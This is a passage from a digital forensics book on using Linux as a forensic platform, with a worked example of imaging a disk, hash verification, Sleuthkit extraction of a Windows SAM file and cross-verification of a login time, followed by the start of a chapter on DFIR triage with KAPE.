heavy lifting for you They package it all up and make the entire operating system available to you
for installation via a variety of methods.
Chapter 10 - Linux and Digital Forensics 186
Some popular distributions include, but are certainly not limited to:
• Ubuntu²²²
• Manjaro²²³
• Arch²²⁴
• Mint²²⁵
• SUSE²²⁶
• Red Hat²²⁷
• Slackware²²⁸
• and many others
So how does one choose a Linux distro, particularly for use as a digital forensics platform?
Choosing Your Platform
From the perspective of a digital forensics examiner, any distro will work within reason. The simplest
answer is to download any popular distribution and just install it. In the long run, just about any
flavor of Linux can be made to act and “feel” like any other.
If you want to do some research first, consider looking at what is already in use. Does your lab or
agency already use Linux in the enterprise? It may be a good idea to use a Linux version that closely
matches what your organization already has deployed. If part of your job is to respond to company
or agency incidents, a more intimate knowledge of the systems involved would be helpful.
Another legitimate answer to the question of “which distro?” is simply to see what others around
you are running. If you have co-workers or labmates that are running a specific version of Linux,
then it makes sense to do the same. Being able to consult with co-workers and friends makes getting
support much easier.
There are, however, other points that might warrant scrutiny. Ubuntu, as popular as it is, has
drifted toward a more desktop-oriented operating system. Configuration options and system settings
have been made much easier through a number of GUI utilities and enhancements that make the
distribution more focused on ease of use - the end user still has access to in-depth control of the
operating system, but there might be some work involved in disabling some of the automation that
might hamper forensic work (automatic mounting of attached storage, for example).
Other Linux distributions offer a far more simple approach - minimally configured “out of the box”,
leaving it completely up to the user to configure the bells and whistles often considered normal
features for modern operating systems. Distributions like Slackware, Void Linux, and Gentoo fall into
²²²https://ubuntu.com/
²²³https://manjaro.org/
²²⁴https://archlinux.org/
²²⁵https://linuxmint.com/
²²⁶https://www.suse.com/
²²⁷https://www.redhat.com/en
²²⁸http://www.slackware.com/
Chapter 10 - Linux and Digital Forensics 187
this category. With these distributions, rather than making systemic changes to a heavily desktop-
oriented configuration, you can start with a more streamlined workstation and work up, building a
more efficient system. The learning curve, however, is steeper.
Another consideration is the choice between a rolling release and an incremental release distro.
Most operating systems are released in discrete numbered versions. Version X is released on a
given date and typically receives only security updates and bug fixes before the next major version.
Eventually, another release, version Y, is made available and so on. Distributions like Slackware,
Debian, and (generally) Ubuntu fall into this category. For the most part, this release schedule
is more stable, because components of the desktop and operating system are updated and tested
together before release. For the forensic examiner, this approach introduces fewer mass changes
to kernel components and software libraries that might affect the forensic environment or impact
evidence integrity and the interpretation of examination results.
A rolling release, on the other hand, continually updates software as new versions become available
for everything from the kernel to base libraries. This has the benefit of always keeping up with
the “latest and greatest”. Changes to upstream software are often immediately supported, though
the overall experience may be slightly less stable and polished. One obvious downside to choosing
a rolling distro is that wholesale changes to the operating system should trigger some validation
testing from the forensic examiner. There should be no doubt that a digital forensics platform is
operating exactly as expected. Constant mass upgrades can interfere with this by possibly breaking
or changing expected outputs or hardware behavior. Examples of rolling release distros include Arch,
Manjaro, Void, and Ubuntu Rolling Rhino.
There also exist ready-made distributions specifically designed for digital forensics. Kali Linux,
Caine, and Tsrugi Linux are common examples. These are generally used as bootable operating
systems for live investigations, but can also be installed directly on hardware to use in a lab.
These systems are ready to go with just about all the forensic software one might need to conduct
digital forensics, incident response, or even Open Source Intelligence (OSINT). From an education
perspective, ready-made forensic distributions have you up and running quickly, ready to learn the
tools. What you might miss however is actually setting up, finding, and installing the tools yourself,
all of which are part of the educational process.
If there are no organizational considerations, then consider using a popular distribution with wide
acceptance in the community. Ubuntu is the first distribution that comes to mind here. Much of
the forensic software available today for Linux is developed and tested on Ubuntu. There is a huge
support community for Ubuntu, so most questions that arise already have easily-accessible answers.
While this can be said for other distributions (Arch Linux comes to mind), Ubuntu is certainly the
most ubiquitous.
If you choose to chart your own course and use a distribution along the lines of Slackware or
Gentoo, you will start with a very ‘vanilla’ installation. From there, you will learn the ins and outs of
configuration, system setup, and administration without a lot of helpful automation. Customization
options are abundant and left almost entirely up to the user.
It may be helpful to create a virtual machine snapshot with the setup you come to prefer. That way,
Chapter 10 - Linux and Digital Forensics 188
a fresh copy can be deployed any time you need one without a lot of tedious prep.
Chapter 10 - Linux and Digital Forensics 189
Learning Linux Forensics
There are copious resources available for Linux learners, from distribution-specific tutorials and
Wiki pages to command-line-oriented blogs and websites. You can take an online course from
Udemy, edX, or even YouTube. Numerous presses publish dozens of books every year.
The digital forensics niche in Linux is no exception, though you may have to dig a bit for the
specific resources you need. Whether you are interested in “Linux forensics” as in using Linux as
your forensic platform or as digital forensics specifically on Linux systems, there is no shortage of
material for the motivated student.
Linux as a Platform
Most of what we have covered so far assumes an interest in choosing and installing Linux for use
as a platform to perform forensics, either as a primary operating system or as an adjunct for cross
verification.
To use Linux this way, first, we learn the operating system itself: installation, configuration, network
environment, and interface. This is common to all users, whether or not the system will be used for
digital forensics. We, however, must consider in particular whether there are any “out-of-the-box”
configurations or automations that interfere with evidence collection or integrity.
Second, there are the tools we need to learn. These fall into a number of categories:
- Evidence Acquisition
- Volume analysis
- File system analysis
- Application analysis
- Memory analysis
- Network enumeration and analysis
- Data parsing
There are specific tools (with some crossover) for each of these categories that we’ll cover in the next
sections.
The Law Enforcement and Forensic Examiner’s Introduction to Linux, the LinuxLEO guide²²⁹, is
available for free. Written by the same author as this chapter, the guide was produced as a complete
guide for beginners. It covers installing Linux, learning the operating system, and using forensic
tools to conduct hands-on exercises using sample practice files. The materials are freely available at
https://www.linuxleo.com.
²²⁹https://www.linuxleo.com
Chapter 10 - Linux and Digital Forensics 190
Linux as a target
Perhaps you have no specific desire to use Linux as a day-to-day forensic platform. There is, however,
something to be said for knowing how Linux works and where to look for evidence should you be
assigned an analysis where the subject device runs a version of Linux.
For years now, Linux has been a popular server operating system, utilized in enterprise environments
across the world. In the past few years, there has been a steady growth of “desktop” Linux,
particularly with the emergence of user-oriented distributions like Ubuntu, Mint, and derivations
based on them. A growth in Linux-compatible software for specialized tasks such as video editing,
publishing, and even gaming has resulted in Linux being more widely adopted. While the platform
has always been well-represented in academia, the proliferation of Linux desktop applications has
resulted in a much wider user base.
Given the popularity of the Android operating system, which is (in simple terms) based on Linux,
there has always been a stronger need for familiarity with Linux in the analysis of mobile devices.
Note, however, that Android is not the same as the Linux we find on desktop computers. They are
similar for sure, but their file system structures and application analysis are widely divergent.
One of the biggest issues that arise when examining a Linux system is the breadth of options
available to a user on a customized desktop or server. For example, an examiner must be at least
somewhat familiar with a subject computer’s init system. Most modern distributions use systemd to
control processes and logging. Other distributions rely on the older text-based BSD init or System
V process scripts. In either case and depending on the nature of the investigation, knowing how
processes are started and how they are stopped might be an important part of the forensic puzzle.
Tracking and identifying user activity is often another important piece of the puzzle. With Linux,
regardless of distribution, users have a wide range of choices for desktop environments, window
managers, file managers, and many other desktop components. All of these components, some used
in combination, store configuration and user activity in different formats and locations which makes
having intimate knowledge of every possible iteration very difficult.
Even the very low-level components of a Linux installation can differ - even within a single
distribution. Users can choose a different bootloader (which loads the operating system) or a
different file system format for various partitions. Most Linux distributions will use the Ext4 file
system by default, but it’s a simple matter to select and install any number of others depending on
preference and use case: btrFS, XFS, ZFS, JFS are all file systems you might encounter. Should an
examiner come across one of these, consideration would need to be given to file recovery, allocation
strategies to help determine file activity, and perhaps forensic software support.
All of these are challenges with examining any of the myriad permutations of Linux. There are a few
books covering the basics of Linux examinations. Much of the information available from a forensic
perspective can also be found in videos and seminars. For anyone looking for a challenging focus
for research or a subject for an academic project, Linux as a forensic target provides ample subject
matter for unique content.
Chapter 10 - Linux and Digital Forensics 191
Linux Forensics in Action
The information covered so far gives an overview of Linux and where it might fit in a digital forensic
workflow. For those just starting out, or for those that have never seen Linux in action before, it
might be useful to actually see a very simple command line session from acquisition through artifact
recovery and interpretation.
First, let’s map a quick outline of what we wish to accomplish, and the tools we will use:
1. Define the goal of the examination (scope)
2. Acquire the evidence (imaging)
3. Verify evidence integrity
4. Map the forensic image and find a volume of interest
5. Identify the file system format within that volume
6. Identify artifacts (e.g. files) of interest
7. Extract and examine the artifacts
8. Parse data from each artifact
Chapter 10 - Linux and Digital Forensics 192
The Tools
There are far too many tools to cover in a single chapter. Again, documents like the previously
mentioned LinuxLEO guide²³⁰ will cover a great number of tools with hands-on opportunities. Here
we will select just a few tools to do a quick analysis of a Microsoft Windows Registry file.
Purpose Tool
Acquisition dd
dc3dd
dcfldd
ddrescue
ewfacquire
Integrity verification (hashing) md5sum
sha1sum
sha256sum etc.
Volume / File System / File Analysis The Sleuthkit (TSK):
mmls
fsstat
fls
istat
icat
blkcalc etc.
Windows Artifacts Libyal (multiple tools/libraries):
libregf
libevtx
liblnk
libscca
libesedb etc.
File Carving scalpel
foremost
bulk_extractor
Data Parsing General GNU Utilities:
sed
awk
grep etc.
²³⁰https://linuxleo.com
Chapter 10 - Linux and Digital Forensics 193
Acquisition Tools
The acquisition tools in the above table work in generally the same manner, creating “bit for bit” or
raw images that are essentially exact duplicates of the storage media being imaged. dd is the original
Linux tool used for basic forensic imaging. It was not explicitly designed for that, but it is useful in
a pinch, particularly because it will be available on just about any Unix or Linux system you might
come across.
Variants of dd include dc3dd and dcfldd. These are both forks of dd that were coded specifically
with digital forensics and media acquisition in mind. Both include logging and built-in hashing
capabilities with multiple available hash algorithms. There are also options to directly split the output
files for easier handling.
Command line imaging tools like dd and those based on it can seem a bit confusing to use at first, but
they all follow the same basic command layout. In simplest terms, you have an input file defined
by if=/dev/<device>. This is our subject media - the media we are imaging and will eventually
examine.
The output file - the image file we are writing to, is defined with of=<imagefile>. The file name
is arbitrary, but the general convention is to use a .dd or .raw extension for images created
with dd. The forensic-specific versions of dd extend the options. Using dc3dd as an example, the
output file can be defined with hof=<imagefile> hash=algorithm to specify hashing the input
media and the resulting image. An examiner can also split the output into smaller segments using
ofs=<imagefile> ofsz=<size>. Combining the options gives a split file with all the segments and the
original media hashed using hofs=<imagefile> hash=<algorithm> ofsz=<size>. The entire output
can be documented with the log=<logfile> option. We will see an example of this in the scenario
in the next section.
Learning how to image with Linux command line tools is a useful skill for all digital forensic
practitioners. Using Linux bootable media to access in-situ media is not uncommon.
Chapter 10 - Linux and Digital Forensics 194
Evidence Integrity
In general, command line collection of a forensic image should include calculation of a hash prior to
imaging. This is usually followed by a hash of the resulting forensic image. In recent years, industry
practitioners have taken to relying on the built-in hashing capabilities of their imaging tools to do
the work for them. Manual hashing is both a good idea and a good skill to have.
The algorithm you select to hash with (MD5, SHA1, etc.) will be determined by your organization’s
policies and the standards you are working under. Issues surrounding hash algorithm selection are
outside the scope of this chapter.
Manually hashing media and files under Linux (or other command line environments for that matter)
is quite simple:
$ sudo sha1sum /dev/sdb
8f37a4c0112ebe7375352413ff387309b80a2ddd /dev/sdb
Where /dev/sdb is the subject storage media. With the hash of the original media recorded, we can
use dd to create
a simple raw image:
$ sudo dd if=/dev/sdb of=imagefile.raw
Now hash the resulting image file and make sure the hash matches that of the original media
(/dev/sdb). This means our image file is an exact duplicate, bit for bit, of the original.
$ sha1sum imagefile.raw
8f37a4c0112ebe7375352413ff387309b80a2ddd imagefile.raw
Chapter 10 - Linux and Digital Forensics 195
Volume / File system analysis
Once we have an image and the integrity of our evidence has been verified, we need to focus our
examination on the volume, file system, and artifacts pertinent to our case. This will include parsing
any partition table (DOS or GPT in most cases), identifying the file system format (exFAT, NTFS,
APFS, etc.), and finally identifying files or objects that need to be recovered, extracted, or examined
for the investigation.
The Sleuthkit (TSK)²³¹ is a collection of command line tools and libraries that can provide this
functionality under Linux. Bootable distributions focused on digital forensics like Kali and Caine
come with TSK by default. It can also be used on Windows and Mac systems. For a quick peek into
an image file, it can be quite useful. No need to fire up a full GUI tool to do a quick file extraction
or view the contents of a directory.
The Sleuthkit supports the following file system types:
• ntfs (NTFS)
• fat (FAT (Auto Detection))
• ext (ExtX (Auto Detection))
• iso9660 (ISO9660 CD)
• hfs (HFS+ (Auto Detection))
• yaffs2 (YAFFS2)
• apfs (APFS)
• ufs (UFS (Auto Detection))
• raw (Raw Data)
• swap (Swap Space)
• fat12 (FAT12)
• fat16 (FAT16)
• fat32 (FAT32)
• exfat (exFAT)
• ext2 (Ext2)
• ext3 (Ext3)
• ext4 (Ext4)
• ufs1 (UFS1)
• ufs2 (UFS2)
• hfsp (HFS+)
• hfsl (HFS (Legacy))
²³¹https://sleuthkit.org/
Chapter 10 - Linux and Digital Forensics 196
There are more than thirty command line tools in the TSK. We will use some of them in the sample
scenario that follows this section:
Tool Purpose
mmls list partitions
fsstat file system information
fls list files
istat file meta-data information (MFT entry, inode, etc.)
icat recover file content
Again, for a more detailed look at The Sleuthkit refer to the LinuxLEO Guide²³² for hands-on
exercises and practice images.
Artifact analysis
Digital forensics is far more than just recovering deleted files. There are databases to parse, temporal
data to extract and organize, and other artifacts to review and make sense of. Operating system
changes, application version changes, and various format changes make keeping our knowledge up
to date a challenging prospect.
Luckily, there are a great many open source projects that specifically address the collection and
analysis of everything from macOS plist to Windows shellbags. Using them might not be as simple
as clicking a line item in a GUI forensic suite or selecting a specific view in a menu. But again, the
open source tools very often provide a simple command line interface to provide an uncluttered look
at the data we need most. In addition, many of these tools provide libraries to allow developers to
include artifact parsing capabilities in more feature-rich tools. One example of this is Autopsy, a GUI
digital forensic tool that utilizes Sleuthkit libraries to parse disk images, storage volumes, and file
systems. Additional functionality is provided by external open-source libraries for artifact parsing
and timeline creation.
For those examiners that are proficient in the Python language, there are often specific Python
libraries that can be used to parse artifacts. In some cases, the previously mentioned open source
libraries will include bindings that provide Python code allowing us to write scripts that can parse
artifacts of interest.
One example of this is the libewf²³³ project. This library provides access to Expert Witness Format
(EWF) images created by many acquisition utilities. The project includes tools like ewfacquire,
ewfmount and ewfinfo to acquire and directly interact with common .E01 images. In addition to
the tools, there are also libraries that can be included in other programs to provide access to EWF
images. The Sleuthkit can be compiled with libewf support, allowing TSK tools to be used directly
on .E01 images without first having to convert them to “raw” format. Finally, pyewf Python bindings
are provided to allow anyone to create scripts using libewf functionality.
²³²https://linuxleo.com
²³³https://github.com/libyal/libewf
Chapter 10 - Linux and Digital Forensics 197
For operating system artifacts, this same approach is found in other libraries like libevtx²³⁴ for
Windows event logs, libregf²³⁵ for Windows registry hives, libscca²³⁶ for Windows prefetch files,
and many others. These are all part of the libyal²³⁷ project. These are not the only application-level
artifact tools and libraries out there, but they can give an idea of what is available.
Tools on the Linux command line are, of course, not limited to computer storage media either. There
are libraries and tools for mobile device analysis as well, such as libimobiledevice²³⁸ for iOS devices.
Application data from mobile devices are often stored in SQL database files. The built-in database
programs are included in many Linux distributions that can often extract desired data from chat
apps, location-based artifacts, and more.
So what does all this look like in use?
²³⁴https://github.com/libyal/libevtx
²³⁵https://github.com/libyal/libregf
²³⁶https://github.com/libyal/libscca
²³⁷https://github.com/libyal
²³⁸https://libimobiledevice.org/
Chapter 10 - Linux and Digital Forensics 198
Sample Scenario: Define the Goal of the Examination
An important part of every digital forensic analysis is defining the goal or at least the scope of your
examination. Focusing on a goal helps us identify the tools required and the methods we should use.
When we provide forensic support to other investigators, the goal of the examination is typically
defined by the support request. In other cases, the elements of the crime or known indicators (in the
case of network compromise) provide the goals.
In this particular exercise, we will go back to our premise of cross verification. Covering every step
in exact detail is outside the scope of this chapter. This is an illustration of what a simple cross-
verification of results might look like.
Let us assume we have the output from a Windows Forensic suite that shows a particular user last
login date of a Windows workstation at a given time. This was done through the examination of the
Security Account Manager (SAM) registry file. The specific time the user logged in is imperative to
the case and we want to cross-verify the results. Our original output shows this:
Username : johnnyFox [1000]
Full Name :
User Comment :
Account Type : Default Admin User
Account Created : Thu Apr 6 01:35:32 2017 Z
Name :
Password Hint : InitialsInCapsCountToFour
Last Login Date : Sun Apr 30 21:23:09 2017 Z
Pwd Reset Date : Thu Apr 6 01:35:34 2017 Z
Pwd Fail Date : Sun Apr 30 21:23:01 2017 Z
Login Count : 7
The goal for this examination is to verify the above Last Login Date with a separate tool under Linux
(our cross verification).
Chapter 10 - Linux and Digital Forensics 199
Sample Scenario: Acquire the Evidence
In this scenario, we can assume the evidence has already been acquired. But for the sake of
illustration, we will show the disk image being created from computer media attached to our Linux
platform.
Linux assigns a device node to attached media. In this case, the device node is /dev/sdb. The
command lsblk will list all the block devices (storage media), attached to our system:
$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
...
sdb 7:0 0 500M 1 disk
-- sdb1 259:4 0 499M 1 part
...
Once we’ve identified the device, we can image it with dd or preferably a more forensic-oriented
version like dc3dd:
$ sudo dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log
This is a simple forensic image obtained with Linux using dc3dd on a subject disk. The input file
(if) is /dev/sdb. The hashed output file (hof) is image.raw. The hash algorithm is SHA1 and we are
writing a log file to image.log.
The log file created above is viewable using the cat command to stream the text file to our terminal:
$ cat image.log
dc3dd 7.2.646 started at 2022-07-27 21:33:40 -0400
compiled options:
command line: dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log
device size: 1024000 sectors (probed), 524,288,000 bytes
sector size: 512 bytes (probed)
524288000 bytes ( 500 M ) copied ( 100% ), 2 s, 237 M/s
524288000 bytes ( 500 M ) hashed ( 100% ), 1 s, 555 M/s
input results for device `/dev/sdb':
1024000 sectors in
0 bad sectors replaced by zeros
094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)
output results for file `image.raw':
Chapter 10 - Linux and Digital Forensics 200
1024000 sectors out
[ok] 094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)
dc3dd completed at 2022-07-27 21:33:42 -0400
This shows us a log of the imaging process, the size of the data acquired, and the calculated hashes
used to help document evidence integrity.
We now have a verified image, obtained from the original storage device, that we can use for our
examination.
Chapter 10 - Linux and Digital Forensics 201
Sample Scenario: Map the Storage Volumes
Once we have created our image, we need to determine the partitioning scheme, and which of those
partitions are of interest to our investigation.
$ mmls image.raw
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Description
000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
001: ------- 0000000000 0000002047 0000002048 Unallocated
002: 000:000 0000002048 0001023999 0001021952 NTFS / exFAT (0x07)
Using the mmls command from the Sleuthkit, we can see that there is only one NTFS file system, at
a sector offset of 2O48 (under Start). We will be using the additional file system and file extraction
tools from TSK, and the sector offset is an important value. We use it to tell TSK which volume to
access inside the image. Media storage partitioning can be quite complex, and with TSK we access
each volume/file system separately.
Chapter 10 - Linux and Digital Forensics 202
Sample Scenario: Identify the File System
Our volume of interest has been identified at an offset inside the image of 2048 sectors. We pass this
volume to the TSK tool fsstat to obtain detailed information on the file system:
$ fsstat -o 2048 image.raw
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: NTFS
Volume Serial Number: CAE0DFD2E0DFC2BD
OEM Name: NTFS
Volume Name: NTFS_2017d
Version: Windows XP
METADATA INFORMATION
--------------------------------------------
First Cluster of MFT: 42581
First Cluster of MFT Mirror: 2
Size of MFT Entries: 1024 bytes
Size of Index Records: 4096 bytes
Range: 0 - 293
Root Directory: 5
CONTENT INFORMATION
--------------------------------------------
Sector Size: 512
Cluster Size: 4096
Total Cluster Range: 0 - 127742
Total Sector Range: 0 - 1021950
$AttrDef Attribute Values:
$STANDARD_INFORMATION (16) Size: 48-72 Flags: Resident
$ATTRIBUTE_LIST (32) Size: No Limit Flags: Non-resident
$FILE_NAME (48) Size: 68-578 Flags: Resident,Index
$OBJECT_ID (64) Size: 0-256 Flags: Resident
$SECURITY_DESCRIPTOR (80) Size: No Limit Flags: Non-resident
$VOLUME_NAME (96) Size: 2-256 Flags: Resident
$VOLUME_INFORMATION (112) Size: 12-12 Flags: Resident
$DATA (128) Size: No Limit Flags:
$INDEX_ROOT (144) Size: No Limit Flags: Resident
$INDEX_ALLOCATION (160) Size: No Limit Flags: Non-resident
$BITMAP (176) Size: No Limit Flags: Non-resident
Chapter 10 - Linux and Digital Forensics 203
$REPARSE_POINT (192) Size: 0-16384 Flags: Non-resident
$EA_INFORMATION (208) Size: 8-8 Flags: Resident
$EA (224) Size: 0-65536 Flags:
$LOGGED_UTILITY_STREAM (256) Size: 0-65536 Flags: Non-resident
There is quite a bit of information in the fsstat output. File system type, version, and volume name
are all items we will want to know for our notes. Other information provided by fsstat can be
useful for documenting and describing files carved from this particular volume, as well as ranges of
physical blocks used to store data.
Chapter 10 - Linux and Digital Forensics 204
Sample Scenario: Identify the File(s) of Interest
In this particular scenario, we are conducting a cross-verification of findings from a file we
already know - the SAM registry file. In a normal Windows installation, the SAM is located in
C:Windowssystem32config. We can use the Sleuthkit fls tool to recursively list all the allocated
files in the volume of interest and specifically look, or grep, for Windows/System32/config/SAM:
$ fls -Fr -o 2048 image.raw | grep -i system32/config/SAM
r/r 178-128-2: Windows/System32/config/SAM
This output gives us the NTFS file system’s Master File Table or MFT entry for the SAM file. In this
case, the MFT entry is 178-128-2.
Chapter 10 - Linux and Digital Forensics 205
Sample Scenario: Extract the data
We will do two quick steps here. First, we will extract the file using the Sleuthkit’s icat command,
which takes the meta-data entry (in this case MFT entry 178), and streams the contents of the data
blocks or clusters to our chosen destination (in this case, an extracted file):
$ icat -o 2048 image.raw 178 > image.SAM
$ file image.SAM
image.SAM: MS Windows registry file, NT/2000 or above
The icat command extracts the SAM file and writes it to the file called image.SAM (arbitrarily named).
Once this is done, we use the Linux file command to make sure that the file type we’ve extracted
matches what we expect. In this case, we expected a Windows registry file, and that’s exactly what
we have.
At this point, we can install libregf. This will allow us to gather some simple identifying information
as well as mount the registry file to allow us to parse it for the information we are seeking. The
following commands are provided by the libregf package:
$ regfinfo image.SAM
regfinfo 20220131
Windows NT Registry File information:
Version: 1.3
File type: Registry
$ mkdir regfmnt
$ regfmount image.SAM regfmnt/
regfmount 20220131
Using commands provided by libregf we confirm the identity and version of the registry file. Then
we create a mount point or directory to which we can attach the registry file so we can browse the
contents.
Chapter 10 - Linux and Digital Forensics 206
Sample Scenario: Parse the Artifact
Given the fact that we’ve already examined this file in our main forensic suite, and we are simply
cross-verifying our results here, we would probably know the account’s Relative ID (RID) - in this
case, the account’s RID is 1000.
Now that we know the RID (from our previous examination - this is a cross verification), we can
browse to the account’s associated keys in the mounted registry file:
$ cd SAM/Domains/Account/Users/
$ ls
(values)/ 000001F4/ 000001F5/ 000003E8/ 000003E9/ Names/
The directory SAM/Domains/Account/Users/ contains keys for each account, listed by RID in hex
format. If you study Windows forensics, you know that we have a System Administrator (RID 500),
a Guest account (RID 501), and user accounts starting at 1000 by default. We can confirm the account
we are interested in is 000003E8 by converting each value to decimal using shell expansion and
finding 1000:
$ echo $((0x3E8))
1000
Changing into that directory, we find several subkey values. Again, studying registry forensics, we
find that the F value contains an account’s login information, so we change our directory to (values)
for that account:
$ cd 000003E8/(values)
$ ls
F UserPasswordHint V
There are three values listed, including F.
Chapter 10 - Linux and Digital Forensics 207
Sample Scenario: Cross Verify the Findings
Using a hex viewer included with Linux (xxd), we can look at the subkey’s value. The Last Login
Date is stored at hex offset 8.
$ xxd F
00000000: 0200 0100 0000 0000 678E 5DF7 F7C1 D201 ........g.].....
00000010: 0000 0000 0000 0000 20D7 BF15 76AE D201 ........ ...v...
00000020: FFFF FFFF FFFF FF7F 5CE9 5DF2 F7C1 D201 .........].....
00000030: E803 0000 0102 0000 1402 0000 0000 0000 ................
00000040: 0000 0700 0100 0000 0000 4876 488A 3600 ..........HvH.6.
Hex offset 8 in the above output is on the first line: 678E 5DF7 F7C1 D201.
There are a number of tools available to convert that hex string to a date value. We will use a simple
python script (WinTime.py²³⁹).
$ python ~/WinTime.py 678e5df7f7c1d201
Sun Apr 30 21:23:09 2017
Here again, is the original output from the analysis we are trying to verify (with some output
removed for brevity):
...
Last Login Date : **Sun Apr 30 21:23:09 2017 Z**
...
So we can see that our original analysis, using a common digital forensics tool under Windows, has
been cross verified with a completely separate set of tools under a different operating system. A far
more detailed look at this level of analysis is covered in the aforementioned LinuxLEO guide.
Note that we included the acquisition here for completeness, but in a real cross-verification situation,
the image already acquired is fine to use - it has generally already been verified by hashing.
We’ve actually accomplished a bit more by verifying our results with Linux. In addition to proving
the veracity of what our original tool found, we have focused on a “smoking gun” artifact and
manually extracted and parsed it ourselves. This entire manual process will go in your notes along
with any research you needed to do in order to complete it (What registry file do I need? Where is
the login data stored? What offset? What format?). Should you ever be called to testify or participate
in any adjudication process, you will be better prepared to answer the opposition’s questions on how
your original tool found what it reported.
This same approach applies to the results of a mobile device analysis. In many mobile device analysis
suites, chats are displayed in a GUI tool and organized by conversation. Find something important to
²³⁹https://linuxleo.com/Files/WinTime
Chapter 10 - Linux and Digital Forensics 208
the investigation? Fire up a Linux command line and dig into the database yourself. In many cases,
you don’t even need to leave your Windows forensic workstation desktop. You can use WSL/WSL2,
or SSH into your physical Linux workstation or VM using PuTTY²⁴⁰.
²⁴⁰https://putty.org
Chapter 10 - Linux and Digital Forensics 209
Closing
While doing all this on the command line looks daunting, it is an excellent way to drill down to
the “bits and bytes” and learn digital forensics from the ground up. There is no doubt that a full
GUI suite of digital forensic tools can be a more efficient way of drilling into large amounts of data
quickly. Where the Linux command line excels is in forcing you to learn exactly where you need to
look for specific data and how it is stored.
There are a growing number of ways to access a Linux environment without the need for excessive
resources. Linux and its powerful tools are increasingly more accessible to forensic examiners and
modern digital forensic laboratories.
Chapter 11 - Scaling, scaling, scaling, a
tale of DFIR Triage
By Guus Beckers²⁴¹ | LinkedIn²⁴²
What is triage?
While full disk analysis certainly has its place, triaging is an essential part of digital forensics. The
purpose of triage is twofold, to cut down on the noise generated by the multitude of events on a
host and to determine if deep-dive forensics is required. As time and computing power are precious
resources, it is best not to waste them. Luckily, there are a couple of concepts and tools that can help
an investigator out on any level of the investigation.
What should be included in a triage?
Before getting nitty gritty with tools let’s examine what’s useful to include within a triage while
dealing with the majority of cases. If specific cases deal with investigating well known artifacts do
not hesitate to add them to your list of triage items. It is advisable to collect multiple sources of
evidence type to get a through understanding of the case at hand, sometimes evidence will not be
available within all data structures due to the specific behavior of the operating system while at
other times an adversary might have deleted one of the available sources. Without further ado, let’s
take a look at the list:
²⁴¹http://discordapp.com/users/323054846431199232
²⁴²https://www.linkedin.com/in/guusbeckers/
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 211
• A series of artifacts that keep track of locations of files on the disk or an file manager and any
performed actions (renaming/deleting), this can be a $MFT or a list of locations that has been
accessed.
• Artifacts which track the history of included files within a folder.
• Any hibernation or swap files that have been written to disk, these particular artifacts can
extend your window into the past by days or even weeks.
• Artifacts that indicate account usage, modification or deletion.
• Artifacts that can clarify which applications have been installed or uninstalled at a particular
date.
• Artifacts which can be used to prove application execution in the past.
• Artifacts which can track network or data transfer by a particular process.
• Any available web browser history and a record of auxiliary actions such as initiated
downloads.
• Artifacts which track external events such as plugging in USB drives or/and other devices.
• Any available event logs that have been maintained by the operating system or relevant
applications.
• Records of admin level activities on a system.
These artifacts can be used for initial analysis while further processing of a case takes place.
Forensic triage of one or a limited amount of hosts
Historically, to examine a computer, an investigator would manually collect all artifacts and going
through them one by one. You would need to know the artifact, go to the folder containing the
artifact, export and repeat the process for any relevant artifact. To say this takes a lot of time
investment is an understatement. A few years ago, KAPE was introduced to the forensic community.
It is a standalone executable that contains a wealth of forensic knowledge on where artifacts live on
a computer (knowledge you can extend by collaborating on the public GitHub). KAPE contains a
set of definitions called Targets. A Target defines where a artifact lives on a system. Collecting it is
as easy as ticking a checkbox. Targets can also contain other Targets. In this manner, KAPE offers
various triage Targets, thereby allowing an investigator to perform triage of an entire host just by
selecting a single Target. The Target collection can also be automated on endpoints by utilizing its
command line counterpart.
The second part of KAPE covers analysis through definitions called Modules. A Module can comb
through data collected by a Target and transform it to a file format that’s easy to ingest in other
tools. It does this by interacting with third-party tools that are part of a Module. Any executable
that uses a command line is a viable option. As an example, KAPE comes with the entire suite of
forensic parsers by Eric Zimmerman (for an entire list check here²⁴³), which cover the most popular
Windows forensic artifacts.
²⁴³https://ericzimmerman.github.io/
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage 212
Of particular note for triage is the KapeTriage Target²⁴⁴. The following description is provided at the
time of writing:
1 KapeTriage collections will collect most of the files needed for a DFIR Investigatio
2 n. This Target pulls evidence from File System files, Registry Hives, Event Logs, Sc
3 heduled Tasks, Evidence of Execution, SRUM data, SUM data, Web Browser data (IE/Edge
4 , Chrome, Firefox, etc), LNK Files, Jump Lists, 3rd party remote access software log
5 s, antivirus logs, Windows 10 Timeline database, and $I Recycle Bin data files.
The KapeTriage collection can be post-processed using the !EZParser Module²⁴⁵. These parsers, also
written by Eric Zimmerman, can be used to extract information from the most common artifacts.
Data will be made available in CSV format.
These parsers (and other tools) can also be downloaded individually here²⁴⁶. Among the tools is
Timeline Explorer, which is a utility that can open CSV files and has robust search and sorting
options. A description and demonstration of Timeline Explorer is available at AboutDFIR²⁴⁷.
KAPE can be used during live investigations but also after a forensic image has been created. A
recommended tool to use with KAPE is Arsenal Image Mounter. Among its capabilities is read-only
and write-protected image mounting. Just point KAPE at the assigned drive letter and it can perform
collection and analysis.
Utilizing KAPE, collection and transformation of artifacts is brought down to a matter of minutes.
This allows an investigator to perform triage to determine if a deep-dive is required or perform triage
while other forensic evidence is still processing.
Another possibility when dealing with a single host is creating a custom content image using FTK
Imager. You will be able to manually select the artifacts you want to collect using a graphical
interface. Richard Davis covers this extensively in a video of his 13Cubed digital forensics YouTube
